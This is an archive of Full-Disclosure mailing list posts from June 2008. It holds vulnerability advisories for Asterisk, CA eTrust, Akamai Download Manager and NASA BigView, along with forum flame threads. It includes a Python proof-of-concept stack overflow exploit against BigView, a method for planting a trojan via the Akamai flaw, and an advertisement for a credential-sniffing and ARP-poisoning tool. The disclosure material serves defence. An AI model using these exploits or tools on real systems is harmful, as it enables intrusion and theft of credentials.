Research CA, 1 CA Plaza, Islandia, NY 11749 Contact http://www.ca.com/us/contact/ Legal Notice http://www.ca.com/us/legal/ Privacy Policy http://www.ca.com/us/privacy/ Copyright (c) 2008 CA. All rights reserved. -----BEGIN PGP SIGNATURE----- Version: PGP Desktop 9.5.3 (Build 5003) wj8DBQFIRwHDeSWR3+KUGYURAnaXAJ4pAnPHSzdRNTNnsUkYaAnTE4A3EwCeO+Xu yWm2EZzO8Qdo3aNVgouIDcs= =W2lY -----END PGP SIGNATURE----- From hdw at kallisti.se Wed Jun 4 22:47:50 2008 From: hdw at kallisti.se (Anders B Jansson) Date: Wed, 04 Jun 2008 23:47:50 +0200 Subject: [Full-disclosure] [offtopic] Fwd: Comments on: Phoenix Mars Lander site hacked In-Reply-To: <4b6ee9310806041229s576ef31djcfec69bb742beaf1@mail.gmail.com> References: <4b6ee9310806040942g59ffa15t8ad84fff62c66214@mail.gmail.com> <282010.38051.qm@web38903.mail.mud.yahoo.com> <9a4ce7b20806041146x82fc4ebi2a12fa2ddb7ac678@mail.gmail.com> <4b6ee9310806041229s576ef31djcfec69bb742beaf1@mail.gmail.com> Message-ID: <48470D86.1080504@kallisti.se> n3td3v wrote: > I'm not a troll, i'm a serious security researcher. > > I was misrepresented in the media by SecurityFocus Robert Lemos who > ruined my image. Except that your are not serious, you are not a researcher and you have not posted anything ever that has shown any clue what so ever about security. It is possible that you are misrepresented but then you are misrepresented by your own moronic rants. -- // hdw From security at asterisk.org Wed Jun 4 23:18:49 2008 From: security at asterisk.org (Asterisk Security Team) Date: Wed, 04 Jun 2008 17:18:49 -0500 Subject: [Full-disclosure] AST-2008-009: (Corrected subject) Remote crash vulnerability in ooh323 channel driver Message-ID: Asterisk Project Security Advisory - AST-2008-009 +------------------------------------------------------------------------+ | Product | Asterisk-Addons | |--------------------+---------------------------------------------------| | Summary | Remote crash vulnerability in ooh323 channel | | | driver | |--------------------+---------------------------------------------------| | Nature of Advisory | Remote crash | |--------------------+---------------------------------------------------| | Susceptibility | Remote unauthenticated sessions | |--------------------+---------------------------------------------------| | Severity | Major | |--------------------+---------------------------------------------------| | Exploits Known | No | |--------------------+---------------------------------------------------| | Reported On | May 29, 2008 | |--------------------+---------------------------------------------------| | Reported By | Tzafrir Cohen | |--------------------+---------------------------------------------------| | Posted On | June 4, 2008 | |--------------------+---------------------------------------------------| | Last Updated On | June 4, 2008 | |--------------------+---------------------------------------------------| | Advisory Contact | Mark Michelson | |--------------------+---------------------------------------------------| | CVE Name | CVE-2008-2543 | +------------------------------------------------------------------------+ +------------------------------------------------------------------------+ | Description | The ooh323 channel driver provided in Asterisk Addons | | | used a TCP connection to pass commands internally. The | | | payload of these packets included addresses of memory | | | which were to be freed after the command was processed. | | | By sending arbitrary data to the listening TCP socket, | | | one could cause an almost certain crash since the | | | command handler would attempt to free invalid memory. | | | This problem was made worse by the fact that the | | | listening TCP socket was bound to whatever IP address | | | was specified by the "bindaddr" option in ooh323.conf | +------------------------------------------------------------------------+ +------------------------------------------------------------------------+ | Resolution | The TCP connection used by ooh323 has been replaced with | | | a pipe. The effect of this change is that data from | | | outside the ooh323 process may not be injected. | +------------------------------------------------------------------------+ +------------------------------------------------------------------------+ | Affected Versions | |------------------------------------------------------------------------| | Product | Release | | | | Series | | |----------------------------------+-------------+-----------------------| | Asterisk Open Source | 1.0.x | N/A | |----------------------------------+-------------+-----------------------| | Asterisk Open Source | 1.2.x | N/A | |----------------------------------+-------------+-----------------------| | Asterisk Open Source | 1.4.x | N/A | |----------------------------------+-------------+-----------------------| | Asterisk Addons | 1.2.x | All versions prior to | | | | 1.2.9 | |----------------------------------+-------------+-----------------------| | Asterisk Addons | 1.4.x | All versions prior to | | | | 1.4.7 | |----------------------------------+-------------+-----------------------| | Asterisk Business Edition | A.x.x | N/A | |----------------------------------+-------------+-----------------------| | Asterisk Business Edition | B.x.x | N/A | |----------------------------------+-------------+-----------------------| | Asterisk Business Edition | C.x.x | N/A | |----------------------------------+-------------+-----------------------| | AsteriskNOW | pre-release | N/A | |----------------------------------+-------------+-----------------------| | Asterisk Appliance Developer Kit | 0.x.x | N/A | |----------------------------------+-------------+-----------------------| | s800i (Asterisk Appliance) | 1.0.x | N/A | +------------------------------------------------------------------------+ +------------------------------------------------------------------------+ | Corrected In | |------------------------------------------------------------------------| | Product | Release | |------------------------------------------+-----------------------------| | Asterisk Addons 1.2 | 1.2.9 | |------------------------------------------+-----------------------------| | Asterisk-Addons 1.4 | 1.4.7 | |------------------------------------------+-----------------------------| +------------------------------------------------------------------------+ +------------------------------------------------------------------------+ | Links | | +------------------------------------------------------------------------+ +------------------------------------------------------------------------+ | Asterisk Project Security Advisories are posted at | | http://www.asterisk.org/security | | | | This document may be superseded by later versions; if so, the latest | | version will be posted at | | http://downloads.digium.com/pub/security/AST-2008-009.pdf and | | http://downloads.digium.com/pub/security/AST-2008-009.html | +------------------------------------------------------------------------+ +------------------------------------------------------------------------+ | Revision History | |------------------------------------------------------------------------| | Date | Editor | Revisions Made | |-------------------+----------------------+-----------------------------| | Jun 3, 2008 | Mark Michelson | Initial draft | +------------------------------------------------------------------------+ Asterisk Project Security Advisory - AST-2008-009 Copyright (c) 2008 Digium, Inc. All Rights Reserved. Permission is hereby granted to distribute and publish this advisory in its original, unaltered form. From security at asterisk.org Wed Jun 4 23:03:26 2008 From: security at asterisk.org (Asterisk Security Team) Date: Wed, 04 Jun 2008 17:03:26 -0500 Subject: [Full-disclosure] AST-2008-009: AST-2008-007 Cryptographic keys generated by OpenSSL on Debian-based systems compromised Message-ID: Asterisk Project Security Advisory - AST-2008-009 +------------------------------------------------------------------------+ | Product | Asterisk-Addons | |--------------------+---------------------------------------------------| | Summary | Remote crash vulnerability in ooh323 channel | | | driver | |--------------------+---------------------------------------------------| | Nature of Advisory | Remote crash | |--------------------+---------------------------------------------------| | Susceptibility | Remote unauthenticated sessions | |--------------------+---------------------------------------------------| | Severity | Major | |--------------------+---------------------------------------------------| | Exploits Known | No | |--------------------+---------------------------------------------------| | Reported On | May 29, 2008 | |--------------------+---------------------------------------------------| | Reported By | Tzafrir Cohen | |--------------------+---------------------------------------------------| | Posted On | June 4, 2008 | |--------------------+---------------------------------------------------| | Last Updated On | June 4, 2008 | |--------------------+---------------------------------------------------| | Advisory Contact | Mark Michelson | |--------------------+---------------------------------------------------| | CVE Name | CVE-2008-2543 | +------------------------------------------------------------------------+ +------------------------------------------------------------------------+ | Description | The ooh323 channel driver provided in Asterisk Addons | | | used a TCP connection to pass commands internally. The | | | payload of these packets included addresses of memory | | | which were to be freed after the command was processed. | | | By sending arbitrary data to the listening TCP socket, | | | one could cause an almost certain crash since the | | | command handler would attempt to free invalid memory. | | | This problem was made worse by the fact that the | | | listening TCP socket was bound to whatever IP address | | | was specified by the "bindaddr" option in ooh323.conf | +------------------------------------------------------------------------+ +------------------------------------------------------------------------+ | Resolution | The TCP connection used by ooh323 has been replaced with | | | a pipe. The effect of this change is that data from | | | outside the ooh323 process may not be injected. | +------------------------------------------------------------------------+ +------------------------------------------------------------------------+ | Affected Versions | |------------------------------------------------------------------------| | Product | Release | | | | Series | | |----------------------------------+-------------+-----------------------| | Asterisk Open Source | 1.0.x | N/A | |----------------------------------+-------------+-----------------------| | Asterisk Open Source | 1.2.x | N/A | |----------------------------------+-------------+-----------------------| | Asterisk Open Source | 1.4.x | N/A | |----------------------------------+-------------+-----------------------| | Asterisk Addons | 1.2.x | All versions prior to | | | | 1.2.9 | |----------------------------------+-------------+-----------------------| | Asterisk Addons | 1.4.x | All versions prior to | | | | 1.4.7 | |----------------------------------+-------------+-----------------------| | Asterisk Business Edition | A.x.x | N/A | |----------------------------------+-------------+-----------------------| | Asterisk Business Edition | B.x.x | N/A | |----------------------------------+-------------+-----------------------| | Asterisk Business Edition | C.x.x | N/A | |----------------------------------+-------------+-----------------------| | AsteriskNOW | pre-release | N/A | |----------------------------------+-------------+-----------------------| | Asterisk Appliance Developer Kit | 0.x.x | N/A | |----------------------------------+-------------+-----------------------| | s800i (Asterisk Appliance) | 1.0.x | N/A | +------------------------------------------------------------------------+ +------------------------------------------------------------------------+ | Corrected In | |------------------------------------------------------------------------| | Product | Release | |------------------------------------------+-----------------------------| | Asterisk Addons 1.2 | 1.2.9 | |------------------------------------------+-----------------------------| | Asterisk-Addons 1.4 | 1.4.7 | |------------------------------------------+-----------------------------| +------------------------------------------------------------------------+ +------------------------------------------------------------------------+ | Links | | +------------------------------------------------------------------------+ +------------------------------------------------------------------------+ | Asterisk Project Security Advisories are posted at | | http://www.asterisk.org/security | | | | This document may be superseded by later versions; if so, the latest | | version will be posted at | | http://downloads.digium.com/pub/security/AST-2008-009.pdf and | | http://downloads.digium.com/pub/security/AST-2008-009.html | +------------------------------------------------------------------------+ +------------------------------------------------------------------------+ | Revision History | |------------------------------------------------------------------------| | Date | Editor | Revisions Made | |-------------------+----------------------+-----------------------------| | Jun 3, 2008 | Mark Michelson | Initial draft | +------------------------------------------------------------------------+ Asterisk Project Security Advisory - AST-2008-009 Copyright (c) 2008 Digium, Inc. All Rights Reserved. Permission is hereby granted to distribute and publish this advisory in its original, unaltered form. From dvlabs at tippingpoint.com Wed Jun 4 19:02:27 2008 From: dvlabs at tippingpoint.com (DVLabs) Date: Wed, 4 Jun 2008 13:02:27 -0500 Subject: [Full-disclosure] TPTI-08-05: CA ETrust Secure Content Manager Gateway FTP LIST Stack Overflow Vulnerability Message-ID: <37C892BB-BC9A-465C-893C-A2DFE0D938D7@tippingpoint.com> TPTI-08-05: CA ETrust Secure Content Manager Gateway FTP LIST Stack Overflow Vulnerability http://dvlabs.tippingpoint.com/advisory/TPTI-08-05 June 4, 2008 -- CVE ID: CVE-2008-2541 -- Affected Vendors: Computer Associates -- Affected Products: Computer Associates eTrust Secure Content Manager -- Vulnerability Details: This vulnerability allows attackers to execute arbitrary code on vulnerable installations of Computer Associates eTrust SCM. Authentication is not required to exploit this vulnerability. The specific flaw exists in the HTTP Gateway service icihttp.exe running on port 8080. When issuing a request for a FTP service the process tries to decorate the contents of the transaction. In this particular case by specifying a overly long response to a LIST command a stack buffer can be overflowed. Successful exploitation can lead to complete system compromise under the SYSTEM context. -- Vendor Response: Computer Associates has issued an update to correct this vulnerability. More details can be found at: https://support.ca.com/irj/portal/anonymous/phpsupcontent?contentID=177784 -- Disclosure Timeline: 2008-05-19 - Vulnerability reported to vendor 2008-06-04 - Coordinated public release of advisory -- Credit: This vulnerability was discovered by: * Cody Pierce, TippingPoint DVLabs From cocoruder at gmail.com Thu Jun 5 02:46:22 2008 From: cocoruder at gmail.com (cocoruder) Date: Thu, 5 Jun 2008 09:46:22 +0800 Subject: [Full-disclosure] Akamai Download Manager File Downloaded To Arbitrary Location Vulnerability Message-ID: <3d7a6e870806041846i2051aa3bl123532b427953bcd@mail.gmail.com> Akamai Download Manager File Downloaded To Arbitrary Location Vulnerability by cocoruder(frankruder at hotmail.com) http://ruder.cdut.net Summary: A parameter injection vulnerability exists in Akamai Download Manager. By exploiting this vulnerability, the remote attacker can make the users to download arbitrary file, and save it to arbitrary location while they are visiting a vicious web page. It means an attacker who successfully exploits this vulnerability can run arbitrary code on the affected system. Affected Software Versions: Akamai Download Manager ActiveX Control 2.2.3.5 Details: The file "http://dlm.tools.akamai.com/tools/upgrade.html" is a sample that calls this ActiveX Control, its parameter is set as follows: Then the value of "URL" is set. However, if we inject other characters to "URL", it also could be parsed correctly. For example: Since the parameter values set by ActiveX are saved in a temporary file as INI file format, in the above manner the value of "referer" will be changed. In addition, the parameter "target" is used to setting the loacation of the downloaded file, it has following meanings: "DESKTOP" the file will be saved on the desktop "AUTO" the file will be saved in Temporary Internet Files "" ask the user to choose the saving location Normally the value of "target" can only be set as the above three values, any other values will be filtered. Nevertheless, the parameter injection vulnerability can set the value of "target" arbitrarily, if the value is a valid file path, Akamai Download Manager will download the target file directly in it without any interaction with users. As a result, attackers can construct a vicious web page to download a file that could be controled to any location of the user's system. One of the possible ways of attacking is to download the trojan in "C:\Documents and Settings\All Users\Start Menu\Programs\Startup" directory, then it will be executed when next time the user logs in to the system. How to Reproduce: An example exploit is available on: http://ruder.cdut.net/attach/Akamai_DM_Vul/Akamai_DM_Vul_Exploit.html This exploit will download the following file to your "Startup" directory with a new name "calc_run.exe": http://ruder.cdut.net/attach/calc.exe MD5 Hash:E3FCB903305F8EE5551EA66F5C096737 Solution: The fixed version is 2.2.3.7, please update your Akamai Download Manager via the following url: http://dlm.tools.akamai.com/tools/upgrade.html Akamai has released an advisory for this vulnerability which is available on: http://www.securityfocus.com/archive/1/493077/30/0/threaded CVE Information: CVE-2008-1770 Disclosure Timeline: 2008.04.02 Vendor notified via email 2008.04.03 Vendor responded 2008.04.22 The vendor sent me the new edition of the product 2008.04.22 Confirmed the vulnerability had been fixed correctly 2008.05.12 The vendor had released the fixed edition silently, and did not inform me or release public advisory 2008.05.12 Asked them for the reason 2008.05.12 Vendor replied: "Once we are sure that all of our customers have been given the opportunity to upgrade, we will post a public advisory" 2008.05.12 Decided to give the maximum of two weeks to them for pushing the patch 2008.06.02 Sent a warning of the coming independent advisory, and asked the vendor to join us 2008.06.02 Vendor asked for an additional 48 hours for coordinated public disclosure 2008.06.04 Coordinated vulnerability disclosure --EOF-- From p.nolan at comcast.net Thu Jun 5 03:42:19 2008 From: p.nolan at comcast.net (Patrick Nolan) Date: Wed, 4 Jun 2008 19:42:19 -0700 Subject: [Full-disclosure] [offtopic] Fwd: Comments on: Phoenix MarsLander site hacked In-Reply-To: <4b6ee9310806041229s576ef31djcfec69bb742beaf1@mail.gmail.com> References: <4b6ee9310806040942g59ffa15t8ad84fff62c66214@mail.gmail.com><282010.38051.qm@web38903.mail.mud.yahoo.com><9a4ce7b20806041146x82fc4ebi2a12fa2ddb7ac678@mail.gmail.com> <4b6ee9310806041229s576ef31djcfec69bb742beaf1@mail.gmail.com> Message-ID: <029301c8c6b5$c6d35ce0$8400a8c0@UNIT4> > -----Original Message----- > From: full-disclosure-bounces at lists.grok.org.uk > [mailto:full-disclosure-bounces at lists.grok.org.uk] On Behalf Of n3td3v > Sent: Wednesday, June 04, 2008 12:29 PM > > I'm not a troll, i'm a serious security researcher. > A few articles or counter-articles http://www.theregister.co.uk/2006/10/23/linguist_fingers_security_troll/page 2.html http://blogs.ittoolbox.com/security/dmorrill/archives/security-trolls-n3td3v -12460 > I was misrepresented in the media by SecurityFocus Robert > Lemos who ruined my image. > > The findings have been post, > > http://smear-campaign-against-n3td3v.blogspot.com/2007/12/smea > r-campaign-against-n3td3v.html > > All the best, > n3td3v Other links of non-interest... http://ph33r.org/updates/2006/10/20/n3td3v-true-identity-finally-discovered. html http://sunbeltblog.blogspot.com/2006/10/hunt-for-n3td3v.html http://www.hackerfactor.com/papers/who_is_n3td3v.pdf .=Pn. From root_ at fibertel.com.ar Thu Jun 5 04:28:41 2008 From: root_ at fibertel.com.ar (root) Date: Thu, 05 Jun 2008 00:28:41 -0300 Subject: [Full-disclosure] CORE-2008-0425 - NASA BigView Stack Buffer Overflow In-Reply-To: <4846EE26.1010508@coresecurity.com> References: <4846EE26.1010508@coresecurity.com> Message-ID: <48475D69.4050806@fibertel.com.ar> Take this, Luigi "no fix" Auriemma! CORE Security Technologies Advisories wrote: > -----BEGIN PGP SIGNED MESSAGE----- > Hash: SHA1 > > Core Security Technologies - CoreLabs Advisory > http://www.coresecurity.com/corelabs/ > > NASA BigView Stack Buffer Overflow > > > *Advisory Information* > > Title: NASA BigView Stack Buffer Overflow > Advisory ID: CORE-2008-0425 > Advisory URL: http://www.coresecurity.com/?action=item&id=2304 > Date published: 2008-06-04 > Date of last update: 2008-06-03 > Vendors contacted: NASA Ames Research Center > Release mode: Coordinated release > > > *Vulnerability Information* > > Class: Stack Overflow > Remotely Exploitable: Yes (client side) > Locally Exploitable: No > Bugtraq ID: 29517 > CVE Name: CVE-2008-2542 > > > *Vulnerability Description* > > NASA BigView [1] allows for interactive panning and zooming of images of > arbitrary size on desktop PCs running Linux. Using this software, one > can explore (on relatively modest machines) images such as the Mars > Orbiter Camera mosaic [92160x33280 pixels]. > > The BigView package suffers from a stack buffer overflow when parsing > specially crafted (invalid) PNM input files. If successful, a malicious > third party could trigger execution of arbitrary code within the context > of the application, or otherwise crash the whole application. The > vulnerability is caused due to the BigView package not properly checking > the line length of the ascii PNM input files before copying it on a > stack buffer. This can be exploited to get arbitrary code execution by > opening a specially crafted file. > > Exploitation of the PNM overflow problem requires the user to explicitly > open a malicious file. The user should refrain from opening files from > untrusted third parties or accessing untrusted Web sites until the patch > is applied. > > > *Vulnerable Packages* > > . BigView revision 1.8. > . Older BigView versions could be affected too, but they were not tested. > > > *Non-vulnerable Packages* > > . Available through BigView website (since June 2nd 2008, see below). > > > *Vendor Information, Solutions and Workarounds* > > The NASA BigView team has published a new version fixing this > vulnerability. The tarball is available on BigView's website: > http://opensource.arc.nasa.gov/project/bigview/ > > > *Credits* > > This vulnerability was discovered and researched by Alfredo Ortega, from > CORE IMPACT's Exploit Writing Team (EWT), Core Security Technologies. > > > *Technical Description / Proof of Concept Code* > > The BigView package suffers from a stack buffer overflow when parsing > specially crafted (invalid) PNM input files. If successful, a malicious > third party could trigger execution of arbitrary code within the context > of the application, or otherwise crash the whole application. > > The vulnerability resides in the following code at 'Ppm/ppm.C'. Here, > the function 'getline()' reads data from a file into a buffer. This is > the complete function: > > /----------- > > 418 static void getline(int fin, char* lineBuf, int len) > 419 { > 420 bool done=false; > 421 int index=0; > 422 lineBuf[index]=' '; > 423 while(! done){ > 424 lineBuf[index] = getOneChar(fin); > 425 if( lineBuf[index]==10 ) { > 426 lineBuf[index]=0; > 427 done=true; > 428 } > 429 ++index; > 430 } > 431 lineBuf[index]=0; > 432 } > > - -----------/ > > Clearly the function requires the length of the destination buffer, but > it is never used internally. This function is used on the > 'PPM::ppmHeader()' function, to read the header of the PPM file. > > /----------- > > 56 PPM::ppmHeader(string filename, PPM::Format* format, > 57 int* cpp, int* bpc, > 58 int* sizeX, int* sizeY, > 59 int* imageOffset) > 60 { > 61 std::ostringstream err; > 62 char magic[3],lineBuf[512],junk; > 63 int res,max; > . > . > . > 115 while( junk == '#' ){ > 116 getline(fin,lineBuf,512); > 117 cout << "Comment:"< 118 junk = getOneChar(fin); > 119 } > > - -----------/ > > Here, the 'lineBuf' buffer is allocated on the stack, with a size of 512 > bytes. If the PPM contains a line longer than 512 bytes on the header, a > buffer overflow will ensue. The following proof of concept is a python > script that creates a PNM file that triggers the overflow and jumps to > an arbitrary position (0x41414141 on the PoC) when loaded with BigView > compiled on Ubuntu 6.06 LTS. > > /----------- > > ## BigView exploit > ## Alfredo Ortega - Core Security Exploit Writers Team (EWT) > ## Works against BigView "browse" revision 1.8 compiled on ubuntu 6.06 > Desktop i386 > > import struct > w = open("crash.ppm","wb") > w.write("""P3 > #CREATOR: The GIMP's PNM Filter Version > 1.0AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA""") > # This exploit is not trivial, because the function PPM::ppmHeader() > doesn't return inmmediately, and we must modify internal variables to > cause an overwrite of a C++ string destructor executed at the end of the > function to gain control of EIP > # PS.: Congrats for the Phoenix mars Lander! > for i in range(7): > w.write(chr(i)*4) > w.write("AA") > w.write(struct.pack(" w.write(struct.pack(" w.write(struct.pack(" w.write(struct.pack(" w.write(struct.pack(" > #The address of the destructor is hard-coded. Sorry but this is only a PoC! > destination = 0x0805b294 # destructor > value = 0x41414141 #address to jump to > w.write(struct.pack(" > w.write(""" > %d 300 > 255 > 255 > 255 > 255 > """ % value) > w.close() > > - -----------/ > > > *Report Timeline* > > . 2008-04-24: > Initial contact email sent by Core to BigView team setting the estimated > publication date of the advisory to May 19th. > > . 2008-04-28: > Vendor acknowledges the email notification. > > . 2008-04-30: > Core sends the advisory draft to BigView support team. No reply received. > > . 2008-05-12: > New email sent to BigView asking for a response. No reply received. > > . 2008-05-15: > New email sent to BigView asking for a response. > > . 2008-05-15: > BigView support team informs us that a new patched version is ready, but > is not yet available via BigView webpage. > > . 2008-05-19: > Core does not release the advisory (as planned). > > . 2008-05-19: > New email sent to BigView team asking if the fixed version is available > to the users. > > . 2008-05-26: > New email sent to BigView team, refreshing the communications that took > place, and asking for an answer. > > . 2008-06-02: > Vendor responds that a tarball with fixes has been published on > BigView's website. > > . 2008-06-03: > Core sends the final version of the advisory to the BigView team. > > . 2008-06-04: > CORE-2008-0425 advisory is published. > > > *References* > > [1] http://opensource.arc.nasa.gov/project/bigview/ > > > *About CoreLabs* > > CoreLabs, the research center of Core Security Technologies, is charged > with anticipating the future needs and requirements for information > security technologies. We conduct our research in several important > areas of computer security including system vulnerabilities, cyber > attack planning and simulation, source code auditing, and cryptography. > Our results include problem formalization, identification of > vulnerabilities, novel solutions and prototypes for new technologies. > CoreLabs regularly publishes security advisories, technical papers, > project information and shared software tools for public use at: > http://www.coresecurity.com/corelabs/. > > > *About Core Security Technologies* > > Core Security Technologies develops strategic solutions that help > security-conscious organizations worldwide develop and maintain a > proactive process for securing their networks. The company's flagship > product, CORE IMPACT, is the most comprehensive product for performing > enterprise security assurance testing. CORE IMPACT evaluates network, > endpoint and end-user vulnerabilities and identifies what resources are > exposed. It enables organizations to determine if current security > investments are detecting and preventing attacks. Core Security > Technologies augments its leading technology solution with world-class > security consulting services, including penetration testing and software > security auditing. Based in Boston, MA and Buenos Aires, Argentina, Core > Security Technologies can be reached at 617-399-6980 or on the Web at > http://www.coresecurity.com. > > > *Disclaimer* > > The contents of this advisory are copyright (c) 2008 Core Security > Technologies and (c) 2008 CoreLabs, and may be distributed freely > provided that no fee is charged for this distribution and proper credit > is given. > > > *GPG/PGP Keys* > > This advisory has been signed with the GPG key of Core Security > Technologies advisories team, which is available for download at > http://www.coresecurity.com/files/attachments/core_security_advisories.asc. > > -----BEGIN PGP SIGNATURE----- > Version: GnuPG v1.4.7 (MingW32) > Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org > > iD8DBQFIRu4lyNibggitWa0RAljKAJ4iVfRGNB6Hz+tA6DKFqpovws/cwACfSBFF > a9ffEcKqAre7M1jXT9OpHOg= > =UCFz > -----END PGP SIGNATURE----- > > _______________________________________________ > Full-Disclosure - We believe in it. > Charter: http://lists.grok.org.uk/full-disclosure-charter.html > Hosted and sponsored by Secunia - http://secunia.com/ > From security at akamai.com Wed Jun 4 17:04:58 2008 From: security at akamai.com (Akamai Security Team) Date: Wed, 04 Jun 2008 12:04:58 -0400 Subject: [Full-disclosure] Akamai Technologies Security Advisory 2008-0001 (Download Manager) Message-ID: <4846BD2A.3090707@akamai.com> -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 - ---------------------------------------------------- Akamai Technologies Security Advisory 2008-0001 * Akamai ID: 2008-0002 * Date: 2008/04/20 * Product Name: Download Manager * Affected Versions: < 2.2.3.6 * Fixed Version: 2.2.3.7 * CVE IDs: CVE-2008-1770 * CVSS Base Score: (AV:R/AC:H/Au:NR/C:C/I:C/A:C/B:N) 8.0 * Product Description: Akamai Download Manager is a client software application that helps users download content easily, quickly, and reliably. It is available as an ActiveX component or Java applet and provides users the ability to pause, resume downloading at a later time, and automatically recover from dropped connections or system crashes. * Vulnerability Description: Akamai has become aware of a security vulnerability within the Akamai Download Manager up to and including version 2.2.3.5 of the ActiveX control. For successful exploitation, this vulnerability requires a user to be convinced to visit a malicious URL put into place by an attacker. This may then lead to an unauthorized download and automatic execution of arbitrary code run within the context of the victim user. This vulnerability exist only in the Download Manager client software and does not affect Akamai's services in any way. * Patch Instructions: For ActiveX versions: Affected users can upgrade to the latest version of Akamai Download Manager by visiting the following web page: http://dlm.tools.akamai.com/tools/upgrade.html Visiting that page or any other Download Manager enabled page will prompt the user to install the latest version of the software automatically. Akamai has successfully coordinated with each of our enterprise customers to ensure that all are distributing the patched version. To verify the correct version is installed: ~ 1) In Internet Explorer, choose "Internet Options..." from the ~ "Tools" menu. ~ 2) Under the "General" tab, select "Settings..." from the "Temporary ~ Internet files" section. ~ 3) Select "View Objects..." from the "Temporary Internet files ~ folder" section. ~ 4) Find the item for "DownloadManager Control" and verify that the ~ version is "2.2.3.5" or higher. ~ * If you wish to uninstall Download Manager, complete this last step: ~ 5) Find the item for "DownloadManager Control", right-click and ~ select "Remove". ~ 6) When prompted to confirm, choose "Yes". For Java versions: The java version is not persistently installed. No action is required by the user. * Credit: CVE-2008-1770 was independently discovered and brought to Akamai's attention by FortiNet (http://fortinet.com). * Additional Information: CVE-2008-1770 * About Akamai: Akamai? is the leading global service provider for accelerating content and business processes online. Thousands of organizations have formed trusted relationships with Akamai, improving their revenue and reducing costs by maximizing the performance of their online businesses. Leveraging the Akamai EdgePlatform, these organizations gain business advantage today, and have the foundation for the emerging Web solutions of tomorrow. Akamai is "The Trusted Choice for Online Business." For more information, visit www.akamai.com. Our public key: http://www.akamai.com/dl/akamai/Akamai_Security_General.pub - ---------------------------------------------------- -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.4.9 (Darwin) iQIcBAEBAgAGBQJIRr0qAAoJEEngXEVbkoPOCAIQALFsMqxvGd2cK/sv/YwOIyiQ h8b8du+0cy10fIqo9ZGmWUXKNBJUm6sCpt1hZS2PGXxQ5hK8NT877qlQcl1cssVa owug6Riw6qVvoNDYF44l73vNbS5ZJ9C9dTUkmKp9ixMGy2ZRZY34CPZ9DfYvwZzT uMF5LifM3gxPyh/01mqKWu0OXaF/9XgItU37FZfXTkYpt9xdfbp9k9Xs9ANJGWx6 2PcTTH3l+tQf5DAAqoreXA4/iG+9/YukO5by0UHitzqPOg6gqgpyhS3UQH6VlBX/ t4EijL6NbTUYEkAYk6cBW1eBxv0yNHOwm++1duiDmp/zdhoYUnMhNuX2Sjrfq3YH Tm9yU4exPnAsmmfJw9QuRXPoPhhJGOOkBM3FJWLesO6Sdw8ZSLnLUv34v2wEeGp0 ezJg4czr3ybmGJ8KrMpT+pZwuXqiUoIIiv+vxbugbtq/H0TSH2B0M7vs5uMfbUC+ b3LI8C6WV3rbqyPvD0cN7+GgCMQstUuywvpHGvIhC/YZ70ubPNS1VU5RRo17/WvU fBN7DzfPShnubzRISu4VkMOGvN0VGXcGKYe858e3L/5s6dHTlm4k7eUlgt5f6gCd Yw3q7ZNLfKETVNO4mhAjdJfcAYrMAaj3LsfsYh/jMUovST4kbRhTUPFoKiLQN3Jg O4U7Bn8nlok3DY2zHYXE =yGPc -----END PGP SIGNATURE----- From intercepter.mail at gmail.com Thu Jun 5 05:22:28 2008 From: intercepter.mail at gmail.com (inter inter) Date: Thu, 5 Jun 2008 08:22:28 +0400 Subject: [Full-disclosure] next generation sniffer Message-ID: [0x4553-Intercepter] offers the following features: + Sniffing passwords\hashes of the types: ICQ\IRC\AIM\FTP\IMAP\POP3\SMTP\LDAP\BNC\SOCKS\HTTP\WWW\NNTP\CVS\TELNET\MRA\DC++\VNC\MYSQL\ORACLE + Sniffing chat messages of ICQ\AIM\JABBER\YAHOO\MSN\GADU-GADU\IRC\MRA + Promiscuous-mode scanning + ARP scanning + DHCP discovering + Changing MAC address of LAN adapters + Raw mode (with filtering rules) + eXtreme mode + Capturing packets and post-capture (offline) analyzing + Remote traffic capturing via RPCAP daemon + Built-in arp poison module + Reconstruction of SMTP\POP3 messages Works on Windows NT(2K\XP\2k3\Vista). From xploitable at gmail.com Thu Jun 5 07:24:03 2008 From: xploitable at gmail.com (n3td3v) Date: Thu, 5 Jun 2008 07:24:03 +0100 Subject: [Full-disclosure] Gadi Evron not a troll but n3td3v is? Message-ID: <4b6ee9310806042324t6de52605k475765e71fc7f0d5@mail.gmail.com> On Wed, Jun 4, 2008 at 10:47 PM, Anders B Jansson wrote: > n3td3v wrote: >> I'm not a troll, i'm a serious security researcher. >> >> I was misrepresented in the media by SecurityFocus Robert Lemos who >> ruined my image. > > Except that your are not serious, you are not a researcher and you have > not posted anything ever that has shown any clue what so ever about security. > > It is possible that you are misrepresented but then you are misrepresented > by your own moronic rants. > -- > // hdw > Why does Gadi Evron get good press and n3td3v get bad press? We both rant our crap on the mailing lists and don't really know what we're talking about, and both of us have no technical knowledge on any of the topics we rant about, and we both have news groups for posting news articles on. All the best, n3td3v From titon at bastardlabs.com Thu Jun 5 08:06:56 2008 From: titon at bastardlabs.com (titon at bastardlabs.com) Date: Thu, 05 Jun 2008 07:06:56 +0000 Subject: [Full-disclosure] ZDI-08-034: HP StorageWorks Storage Mirroring Authentication Processing Stack Overflow Vulnerability Message-ID: <20080605070656.30920.qmail@s453.sureserver.com> >This one seems exactly the same vulnerability I disclosed in February >2008 and for which I wrote also a testing attack (number 7) in my >doubletakedown proof-of-concept [...blah blah...] Good for you, but you do realize that the bug was reported to the vendor in May 2007. You were just 8 months too late... But since you seem so eager to get some attention, I give you the credit of dropping a POC for an unpatched vuln into FD without even trying to contact the vendor... Well done ! --- [...SNIP...] --- 